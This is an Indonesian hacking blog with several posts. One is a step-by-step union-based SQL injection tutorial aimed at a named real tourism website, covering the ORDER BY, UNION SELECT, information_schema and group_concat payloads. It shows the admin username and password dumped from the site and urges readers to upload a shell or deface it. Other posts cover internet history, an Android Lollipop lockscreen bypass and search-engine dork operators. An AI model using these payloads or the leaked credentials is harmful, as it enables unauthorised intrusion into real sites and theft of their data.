Learning > Practice > Sharing

Monday, 11 June 2018

SQL-Injection Simple Union Based


assalamu'alaikum wr.wb bertemu dengan saya kembali guys, kali ini saya akan membagikan sebuah tutorial murah tapi gk murahan banget ea :'v si noob ini akan membagikan cara bagaimana cara menyuntik pada website orng lain yaitu dengan cara mengesktract sebuah isi dalam database tersebut. jadi kalian semua udah tau ya apa itu sql injection klo masih belum paham silakan cari referensi pengertian tentang sqli.

oke langsung saja kita mulai yang pertama:
  • siapkan kopi dlu :v 
1. langkah pertama kita buka situs http://www.wisatabaharilamongan.com/product-details.php?judul=Games 
 2. kita akan memberikan sebuah query quote ' (tanda petik) pada parameter product-details.php?judul=Games' maka akan terlihat bahwa artikel tersebut hilang!!! dan kita coba beri sebuah comment --+ pada bagian belakang query quote ' contoh : judul=Games' --+ maka artikel pun muncul kembali bahwa situs tersebut vulnerabilty terhadap SQL-Injetcion.
 
3. langkah selanjutnya yaitu mencari jumlah kolom dengan cara menggunakan query order by seperti ini /product-details.php?judul=Games' order by 1--+ dan angka seterusnya sampai kontent menhilang / error.
 

4. terlihat bahwa kolom ke 11 error, berarti jumlah kolomnya ada 10.
 
5. Dan langkah selanjutnya kita mencari sebuah tabel dengan cara mengurutkan nomer colomn 1 sampai ke 10 dengan mengganti function order by menjadi  union all select yang digunakan untuk mengkombinasikan hasil satu atau lebih query dengan select statemenet kedalam single result.  contoh: /product-details.php?judul=Games' union all select 1,3,4,5,6,7,8,9,10--+ maka akan muncul sebuah angka yang bisa kita injeksi.
 

6. sekarang kita akan mengetahui versi database yang digunakan dengan cara memasukan perintah @@version pada angka injeksi seperti /product-details.php?judul=Games' union all select 1,@@version,4,5,6,7,8,9,10--+ versi database yang digunakan adalah 5.6.37.
 
7. langkah berikutnya yaitu memunculkan nama-nama table dengan statement group_concat(table_name) pada angka injeksi tadi dan from information_schema.tables where table_schema=database() sebelum syntax comment --+ contoh: /product-details.php?judul=Games' union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--+ setelah memasukan perintah injeksinya maka akan muncul nama-nama table tersebut.
 
 8. disini saya ingin mendapatkan informasi username dan password di website tersebut dalam database. bahwa username dan password udah jelas pada table user, kita akan mengganti query (table_name,information_schema.tables,table_schema=) menjadi perintah melihat isi column seperti berikut: /product-details.php?judul=Games' union all select 1,2,group_concat(column_name),4,5,6,7,8,9,10 from information_schema.columns where table_name=user--+ jika error, kemungkinan magic_quotes tersetting ON maka untuk nama table user kita harus mengkonvert ke bilangan ASCII atau ke Hexadecimal, atau kebilangan lainnya. disini saya mengkonvert user ke bilangan hexa akan menjadi 75736572 dan diletakan setelah query where table_name=0x75736572.

 9. setelah mengeksekusi perintah injeksi diatas maka akan terlihat nama column dari tabel user tadi.
10. langkah terakhir yaitu mengetahui isi dari colom name,password tersebut dengan mengubah syntax (column_name) dengan nama column contoh sebagai berikut: group_concat(name,0x3,password) dan apa itu 0x3 yaitu sebuah tanda : yang dikonversi menjadi hexadecimal, apa itu wajib ?? tidak. karena itu digunakan untuk memisahkan isi dari column tersebut agar tidak menyatu :v klo menyatu gmn dunk ntar saling suka ea :v. setelah itu hapus query information_schema.columns where table_name=user dan ganti query tersebut menjadi  /product-details.php?judul=Games' union all select 1,2,group_concat(name,0x3,password),4,5,6,7,8,9,10 from user--+ dan taraaa :v terlihat sebuah isi username admin password lamongan255, biasanya sih beberapa developer mengecrypsi nya.


11. dan selanjutnya terserah lu dah mau lo apain tuh site :v upload shell,pasang receh kek biar awto sultan :v wkwkwk, klo mau nebas titip nic aja ./Nx0n3

melalui artikel ini, saya hanya ingin mencurahkan isi otak saja, bagi-bagi ilmu dikit apa yang dimaksud dengan SQL-Injection, walaupun sudah lama banget bugs ini ditemukan, tapi sampai saat ini masih terdapat beberapa site yang vulnerability terhadap SQL-Injection.


ENBE: DO IT AT YOUR OWN RISK :)

Friday, 3 November 2017

Sejarah SIngkat Internet dan Intranet



Pada tahun 1969 departemen pertahanan Amerika Serikat dalam proyek ARPANET (Advanced Research Project Agency Netwok) melakukan demonstrasi bagaimana bias melakukan komunikasi tanpa alas an jarak (jarak tak teringga) melalui telepon menggunakan hardware dan software komputer berbasisi Operasi Unix.pada proyek ARPANET tersebut setelah dirancang bentuk jaringan dengan standarisasi kehandalan dan seberapa besar informasi dapat dipindahkan untuk saling berbagi terbentuklah sebuah protocol baru yang dikenal dengan nama TCP/IP (Transmission Control Protocol)

Tujuan semula dari proyek ARPANET sebenarnya hanya terbatas pada keperluan militer. Pada saat itu departemen pertahan Amerika Serikat (US Departmen of Defense )  membuat system jaringan komputer tersebar dengan menghubungkan komputer di daerah-daerah vital untuk mengatasi masalah bila terjadi serangan nuklir dan untuk menghindari terjadinya informasi terpusat,yang apabila terjadi perang dapat mudah dihancurkan.

Pada mulanya ARPANET hanya menghubungkan 4 situs saja yaitu Sanford Research Institute, University of Utah, UCLA, University of California at Santta Barbara dimana mereka membentuk satu jaringan terpadu di tahun 1969, dan secara umum ARPANET diperkenalkan pada bulan Oktober 1972. Tidak lama kemudian proyek ini berkembang pesat di seluruh daerah, dan semua university di Negara tersebut ingin bergabung, sehinga membuat ARPANET kesulitan untuk mengaturnya.
Oleh sebab itu pada akhir 80-an ARPANET dipecah menjadi dua, yaitu “MILNET” untuk keperluan militer dan untuk “ARPANET” baru yang lebih kecil untuk keperluan non-militer (sipil) seperti, Universitas-universitas. Gabungan kedua jaringan akhirnya dikena dengan Nama DARPA internet, yang kemudian disederhanakan menjadi internet.

Sekitar tahun 1994, kita di Indonesia tahu bias menukmati layanan internet komersial.sebelumnya, beberapa perguruan tinggi seperti Universitas Indonesia telah terlebih dahulu tersambung dengan jaringan internet melalui pintu gerbang (gateway) yang menghubungkan universitas dengan jaringan (network) di luar negeri. Perkembangan internet berkebang sangat ketat cepat dari tahun ke tahun, terutamam pengguna inrernet di indoneisa yang bisa kita lihat dari kata statistic dibawah ini. Dan ini menunjukkan bahwa masyarakat indonesia yang tergolong Negara berkembang sudah sangat maju teknologinya.

Pengertian Internet Dan Intranet



selamat malam para vloger tamvan :v heheh di malam ini mumpung w lagi galau :v saya akan menshare ilmu nih buat kalian semua :v mari kita simak baik-baik
Apa  sih yang dimaksud dengan internet dan intranet?? Dan apa beda nya  ?? manfaat nya bagi kehidupan manusia ?? bahkan mereka yang hanya memiliki pengetahuan relative minimpun dapat menggunakan internet. So,, let’s learn with me together ….. 

Internet (interconnected network), merupakan sebuah system komunilasi global yang menghubungkan komputer-komputer dan jaringan-jaringan di seluruh dunia tanpa mengenal batas teritorial, budaya, dan hokum untuk menyebarkan informasi dan mendapatkan informasi.
Internet  juga memungkinkan pengguna computer diseluruh dunia untuk saling berkomunikasi dan berbagi informasi dengan cara saling bertukar kirim email, mengubungkan computer satu ke computer yang lain, mengirim dan menerima file dalam bentuk text, audio, gambar, membahas sebuah topik tertentu pada newsgroup, website jejaring social, dan lain-lain.

Intranet (intraconnected network), yang diperkenalkan pada tahun 1995 adalah sebuah jaringan komputer berbasis protocol (TCP/IP) seperti internet,dan sistem ini bersifat local, biasanya digunakan di suatu perusahaan atau lembaga.ditujukan bagi karyawan dan pimpinan internal perusahaan,serta dibangun atas dasar kebutuhan perusahaan atau lembaga tersebut.
Perangkat yang digunakan di intranet dengan internet dan perbedaanya terletak pada jangkauan akses.jika internet dapat diakses siapa saja, dimana saja di dunia ini, maka intranet hanya dapat diakses oleh orang,tempat, dan waktu tertentu saja.
Antar intarnet sebenarnya dapat saling berkomunikasi satu dengan hanya lainnya melalui sambungan internet yang memberikan tulang punggung komunikasi jarak jauh.akan tetapi sebetulnya sebuah internet tidak perlu sambungan luar ke internet untuk berfungsi secara benar.intranet ini menggunakan semua protocol TCP/IP dan aplikasinya sehingga kita memiliki “privare” internet.

sekian dari saya apabila ada kekuran mohon maklumi saja ;'v
wassalamu'alaikum wr.wb

Thursday, 2 November 2017

Xploit / membobol sebuah Lockscreen Android 5.x (Lollipop) 2017



pada sebuah Android versi 5.x (Lollipop 5.0 – 5.1.1)  memiliki sebuah celah kelemahan  pada bagian keamanan.keamanan atau bisa disebut security semacam password membuat orang tak berhak bisa membobol kunci layar (lockscreen) tetapi dengan memanfaatkan celah tersebut akan bisa mendapatkan akses penuh pada Android versi Lollipop, meski pengguna sudah memasang password atau pattern lock.

untuk bug tersebut memanfaatkan rangkaian angka atau simbol dalam jumlah besar, dan dimasukkan ke dalam wilayah input password saat ponsel dalam posisi untuk melakukan “emergency call”. Proses input ini dilakukan berulang-ulang.Kemudian si attacker membuka kamera melalui menu dan menyalin karakter-karakter di atas dalam kolom input password. Hasilnya, kunci layar akan crash dan otomatis membuka home screen.
Jika hal ini sudah tercapai maka penyerang bisa menjalankan aplikasi apapun, bahkan menyalakan akses ke Android Debug Bridge serta mendapatkan seluruh data di ponsel.

Namun, ternyata tak semua ponsel bisa diserang dengan cara ini. serangan menggunakan bug hanya efektif bila Attacker memiliki akses fisik/langsung ke ponsel yang ditarget.

untuk tutornya insyaallah akan saya share di postingan berikutnya 


Thursday, 21 September 2017

Search Engine Hacking 2017

Search Engine hacking

  Assalamu'alaikum guys,,, :v bertemu lagi dengan saya yang lagi bosen di pagi hari ini :v,mumpung di pagi hari ini saya g ada kerjaan :v yah cuman bengong aja heheh :v. Soo,, kali ini saya akan menulis artikel tentang Search Engine Hacking dan dork :v lengkap gak lengkap gk penting :v yang penting barokah wkwkwk .

 wes cukup bosa-basinya sekarang kita Sebelum mengenal jauh apa itu search engine hacking alangkah baiknya kita mengenal lebih dulu jenis-jenis search engine.
Search engine sejatinya ada 2 jenis yakni Meta Search Engine dan Major Search Engine.
Lalu apa itu meta dan major search engine?

Meta Search Engine
 Search engine jenis ini ialah search engine yang tidak melakukan “crawl” terhadap sebuah situs. Crawl yang dimaksud disini ialah sama dengan menggerayangi, dengan kata lain meta search engine tidak menggerayangi sebuah situs web, tapi menggabungkan hasil dari
beberapa search engine lainnya. Apabila sebuah situs menepati posisi puncak pada beberapa search engine maka situs tersebut juga akan muncul pada hasil sebuah meta search engine. Singkat kata , meta search engine tidak membutuhkan database link
Major Search Engine
 Sebaliknya jenis search engine ini mengambil / mencari informasi situs yang hanya tersimpan didalam databasenya, walaupun ada juga yang bisa mengambil data dari situs atau search engine lain, dan biasanya juga jenis search engine ini dilatarbelakangi dengan adanya :
  • Fungsi search yang baik
  • Pencarian yang cepat
  • Aktualitas info
  • Keakuratan informasi 
 Ditambah dengan fungsi pendukung seperti email, newsgroups, address book dan lain-lain.
Biar kita lebih mengetahui search engine mana yang termasuk meta atau major search engine kita bisa buka website 👉 http://www.klikdisini.com/

Search Engine With Bumbu Dorkingan :v
 Nahh sekarang saatnya kita mengenal apa itu “dork” ?
"Dork adalah sebuah perintah search engine yang berfungsi intuk mengoptimalkan hasil pencarian di search engine"

Dork Google
Dork google terdiri dari:
  1. Inurl
  2. Intitle
  3. Intext
  4. Filetype / ext
  5. Site
  6. related
  7. chache
  8. info
  9. dan masih banyak perintah-perintah dork yang lainnya
Penjelasan:
1. Inurl berasal dari kata in dan url, yang artinya dalam url, dengan kata lain perintah ini digunalkan untuk menghasilkan hasil pencarian yang mengandung kata kunci pada url yang ada cari. Misalkan Anda mengetik perintah “inurl:index.php” maka google akan mencari url-url yang mengandung kata index.php.
2. Intitle berasal dari kata in dan title yang artinya dalam title ( judul ), dengan kata lain perintah ini digunakan untuk mencari kata atau informasi pada judul sebuah website. Misalkan Anda mengetik perintah “intitle:hacking” maka google akan mencari judul website yang mengandung kata hacking.
3. Intext berasal dari kata in dan text yang mempunyai arti yaitu dalam text, dengan kata lain perintah ini digunakan untuk menampilkan hasil pencarian yang berupa kata-kata yang ada bada text ( body ) pada sebuah situs.Misalkan Anda mengetik perintah “intext:carding” maka google akan mencari situs yang mengandung text/kata carding.
4. Filetype / ext adalah 2 perintah yang mempunyai fungsi yang sama yakni untuk mencari sebuah file di internet dengan extensi yang di hendaki, Filetype teridiri dari 2 kata yakni file dan type yang artinya tipe( jenis ) file Sedangkan ext berasal dari kata extension yang artinya extensi Misalkan kita mengetik perintah “filetype:txt” atau “ext:txt” maka yang keluar di hasil pencarian adalah file-file txt yang ada di website.
5. Site: Perintah ini digunakan untuk mencari kata kunci yang Anda cari pada satu alamat situs saja dan juga bias digunakan untuk mencari situs yang mempunyadi domain yg anda cari. Misalkan Kita mencari situs yang berdomain id maka kita tinggal mengetikan “site:id” maka google akan mencari situs-situs yang mempunyai domain id atau misalkan kita mau menelusuri suatu situs misalnya situscoeg:v.go.id maka kita tinggal mengetikkan perintah “site:situscoeg:v.go.id” maka google akan hanya mencari di 1 situs saja yakni Indonesia.go.id. ada sebuah perintah yang fungsinya mirip dengan perintah site ini yakni perintah link.

Dork Yahoo
Dork yahoo terdiri dari:
  1. site:
  2. link:
  3. url:
  4. inurl:
  5. allinurl:
  6. intitle:
  7. allintitle:
  8. info:
  9. hostname:
  10. blog url:
  11. author:
  12. related:
  13. store:
  14. linkdomain:
  15. originurlextension:
w jelasin beberapa aja y :v dork yahoo ny w capek ngetik :'v
1.hostname: perintah ini berfungsi untuk mencari dokumen disitus tertentu saja
contoh: hostname:colay.yahoo.com
2.blog url:perintah ini berfungsi untuk mencari tulisan terhadap blog contoh: blog url:bloglu.com
3.author:perintah ini berfungsi untuk mencari nama penulis buku tertentu
contoh: author:Local-i5 Offensive Security
4.related:fungsi perintah ini untuk mencari informasi yang memiliki kemiripan isi contoh: related:http://situsmu.com
5.store:berfungsi untuk mencari barang-barang atau produk komersial misal: store:jual pacar
6.linkdomain: Perintah ini berfungsi untuk mencari link pada domain tertentu dan tidak perlu menulis http://Contoh: linkdomain:lamongan.go.id
7.originurlextension: Perintah ini berfunsi untuk mematasin extensi file tertentu jika pada goggle mirip perintah filetype: atau ext:
 sebernya masih banyak sih dork search engine yang lain :v seperti (and,or,frase,not,dll) :v klo mau info detail ny silakan komen mbak bro :v.

oke sekian dari saya :v apabila ada kurangnya dari postingan murahan ini say mohon maap sebenar-benarnya :'v eh sebesar-besarnya mksdnya :v :v

nb:bagi para copaser harap cantumkan sumber pembuat cvk.